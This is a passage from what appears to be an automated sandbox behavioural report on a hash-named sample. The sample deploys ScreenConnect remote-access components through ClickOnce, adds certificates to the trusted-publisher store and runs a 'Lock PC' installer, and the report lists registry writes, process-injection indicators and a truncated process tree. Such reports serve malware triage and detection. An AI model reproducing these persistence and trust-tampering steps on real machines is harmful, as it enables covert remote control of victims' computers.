\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56C8F6C1-A45F-4F02-E69D-298C5F597190}\MiscStatus\ lockpc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0 dfsvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\ComponentStore_RandomString = "P055GB4GCDR88OO79PMJ98CR" dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\Transform = 01 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\lock!0800000030b6570eac080000cc0d00000000000000000000 = 30303030303861632c30316462333034346430623233303931 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks ScreenConnect.WindowsClient.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56C8F6C1-A45F-4F02-E69D-298C5F597190}\ = "Qelareza Qoqapaz Object" lockpc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56C8F6C1-A45F-4F02-E69D-298C5F597190}\TypeLib lockpc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_27daf6644b7440f4\lock!1d000000dcb6570ea00d0000f0060000000000000000000087060 = 30303030306461302c30316462333034346432663338663565 ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_ed2a114b08d826ee ScreenConnect.WindowsClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\ComponentStore_RandomString = "W68M1BCQ2CZH82W4JLJP8943" dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 30000000 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_27daf6644b7440f4 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\identity = 53637265656e436f6e6e6563742e436f72652c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\lock!08000000bdb6570ea00d0000f00600000000000000000000 = 30303030306461302c30316462333034346432663338663565 ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\DigestValue = 0203b65e92d2d1200dd695fe4c334955befbddd3 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\DigestMethod = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\Files\ScreenConnect.WindowsBackstageShell.exe.co = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_27daf6644b7440f4\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7 = 01 dfsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0CE9B48A-9CB6-6845-B71D-4FFD8A3AC382}\1.0\ = "PDFPrevHndlr 1.0 Type Library" lockpc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0CE9B48A-9CB6-6845-B71D-4FFD8A3AC382}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\" lockpc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B75E1FB5-0E99-4365-9140-A7B4B1D230E9} lockpc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\implication!scre..tion_25b0fbb6ef7eb094_0018.0003_0f8 = 68747470733a2f2f6b6f696465736661632e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\Files\ScreenConnect.WindowsClient.exe.config_f7f = 01 dfsvc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lockpc.DocHostUIHandler\Clsid lockpc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_27daf6644b7440f4\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0d dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_ed2a114b08d826ee dfsvc.exe Key deleted \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0 dfsvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\StateStore_RandomString = "VWDYGM32JNKZON65BNZR5P5N" dfsvc.exe -
Processes:
e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exedescription ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054 e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe Key deleted \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
ScreenConnect.ClientService.exeLock PC.tmppid Process 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 3648 Lock PC.tmp 3648 Lock PC.tmp -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
ScreenConnect.WindowsClient.exeScreenConnect.WindowsFileManager.exepid Process 208 ScreenConnect.WindowsClient.exe 3044 ScreenConnect.WindowsFileManager.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
dfsvc.exeScreenConnect.ClientService.exeScreenConnect.WindowsBackstageShell.exeScreenConnect.WindowsClient.exedescription pid Process Token: SeDebugPrivilege 2220 dfsvc.exe Token: SeDebugPrivilege 1280 ScreenConnect.ClientService.exe Token: SeDebugPrivilege 704 ScreenConnect.WindowsBackstageShell.exe Token: SeDebugPrivilege 208 ScreenConnect.WindowsClient.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
ScreenConnect.WindowsClient.exeLock PC.tmplockpc.exeScreenConnect.WindowsFileManager.exepid Process 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 3648 Lock PC.tmp 60 lockpc.exe 60 lockpc.exe 60 lockpc.exe 60 lockpc.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
ScreenConnect.WindowsBackstageShell.exeScreenConnect.WindowsClient.exeScreenConnect.WindowsFileManager.exeScreenConnect.WindowsFileManager.exepid Process 704 ScreenConnect.WindowsBackstageShell.exe 208 ScreenConnect.WindowsClient.exe 208 ScreenConnect.WindowsClient.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 3044 ScreenConnect.WindowsFileManager.exe 4472 ScreenConnect.WindowsFileManager.exe 4472 ScreenConnect.WindowsFileManager.exe 4472 ScreenConnect.WindowsFileManager.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exedfsvc.exeScreenConnect.WindowsClient.exeScreenConnect.ClientService.exeScreenConnect.WindowsClient.exeScreenConnect.WindowsClient.exeLock PC.exeLock PC.tmpScreenConnect.WindowsBackstageShell.exedescription pid Process procid_target PID 2592 wrote to memory of 2220 2592 e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe 84 PID 2592 wrote to memory of 2220 2592 e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe 84 PID 2220 wrote to memory of 3488 2220 dfsvc.exe 89 PID 2220 wrote to memory of 3488 2220 dfsvc.exe 89 PID 2220 wrote to memory of 3488 2220 dfsvc.exe 89 PID 3488 wrote to memory of 4208 3488 ScreenConnect.WindowsClient.exe 92 PID 3488 wrote to memory of 4208 3488 ScreenConnect.WindowsClient.exe 92 PID 3488 wrote to memory of 4208 3488 ScreenConnect.WindowsClient.exe 92 PID 1280 wrote to memory of 4640 1280 ScreenConnect.ClientService.exe 94 PID 1280 wrote to memory of 4640 1280 ScreenConnect.ClientService.exe 94 PID 1280 wrote to memory of 4640 1280 ScreenConnect.ClientService.exe 94 PID 1280 wrote to memory of 4140 1280 ScreenConnect.ClientService.exe 95 PID 1280 wrote to memory of 4140 1280 ScreenConnect.ClientService.exe 95 PID 1280 wrote to memory of 4140 1280 ScreenConnect.ClientService.exe 95 PID 1280 wrote to memory of 3020 1280 ScreenConnect.ClientService.exe 99 PID 1280 wrote to memory of 3020 1280 ScreenConnect.ClientService.exe 99 PID 1280 wrote to memory of 3020 1280 ScreenConnect.ClientService.exe 99 PID 1280 wrote to memory of 2692 1280 ScreenConnect.ClientService.exe 104 PID 1280 wrote to memory of 2692 1280 ScreenConnect.ClientService.exe 104 PID 1280 wrote to memory of 2692 1280 ScreenConnect.ClientService.exe 104 PID 1280 wrote to memory of 704 1280 ScreenConnect.ClientService.exe 105 PID 1280 wrote to memory of 704 1280 ScreenConnect.ClientService.exe 105 PID 1280 wrote to memory of 208 1280 ScreenConnect.ClientService.exe 106 PID 1280 wrote to memory of 208 1280 ScreenConnect.ClientService.exe 106 PID 1280 wrote to memory of 208 1280 ScreenConnect.ClientService.exe 106 PID 208 wrote to memory of 828 208 ScreenConnect.WindowsClient.exe 111 PID 208 wrote to memory of 828 208 ScreenConnect.WindowsClient.exe 111 PID 208 wrote to memory of 828 208 ScreenConnect.WindowsClient.exe 111 PID 828 wrote to memory of 620 828 ScreenConnect.WindowsClient.exe 112 PID 828 wrote to memory of 620 828 ScreenConnect.WindowsClient.exe 112 PID 828 wrote to memory of 620 828 ScreenConnect.WindowsClient.exe 112 PID 620 wrote to memory of 3648 620 Lock PC.exe 113 PID 620 wrote to memory of 3648 620 Lock PC.exe 113 PID 620 wrote to memory of 3648 620 Lock PC.exe 113 PID 3648 wrote to memory of 2596 3648 Lock PC.tmp 114 PID 3648 wrote to memory of 2596 3648 Lock PC.tmp 114 PID 3648 wrote to memory of 2596 3648 Lock PC.tmp 114 PID 3648 wrote to memory of 116 3648 Lock PC.tmp 116 PID 3648 wrote to memory of 116 3648 Lock PC.tmp 116 PID 3648 wrote to memory of 116 3648 Lock PC.tmp 116 PID 3648 wrote to memory of 60 3648 Lock PC.tmp 117 PID 3648 wrote to memory of 60 3648 Lock PC.tmp 117 PID 3648 wrote to memory of 60 3648 Lock PC.tmp 117 PID 3648 wrote to memory of 4752 3648 Lock PC.tmp 118 PID 3648 wrote to memory of 4752 3648 Lock PC.tmp 118 PID 3648 wrote to memory of 1416 3648 Lock PC.tmp 120 PID 3648 wrote to memory of 1416 3648 Lock PC.tmp 120 PID 704 wrote to memory of 3044 704 ScreenConnect.WindowsBackstageShell.exe 123 PID 704 wrote to memory of 3044 704 ScreenConnect.WindowsBackstageShell.exe 123 PID 704 wrote to memory of 4472 704 ScreenConnect.WindowsBackstageShell.exe 124 PID 704 wrote to memory of 4472 704 ScreenConnect.WindowsBackstageShell.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe"C:\Users\Admin\AppData\Local\Temp\e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe"1⤵
- Manipulates Digital Signatures
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"2⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Users\Admin\AppData\Local\Apps\2.0\P055GB4G.CDR\88OO79PM.J98\scre..tion_25b0fbb6ef7eb094_0018.0003_27daf6644b7440f4\ScreenConnect.WindowsClient.exe"C:\Users\Admin\AppData\Local\Apps\2.0\P055GB4G.CDR\88OO79PM.J98\scre..tion_25b0fbb6ef7eb094_0018.0003_27daf6644b7440f4\ScreenConnect.WindowsClient.exe"3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3488 -
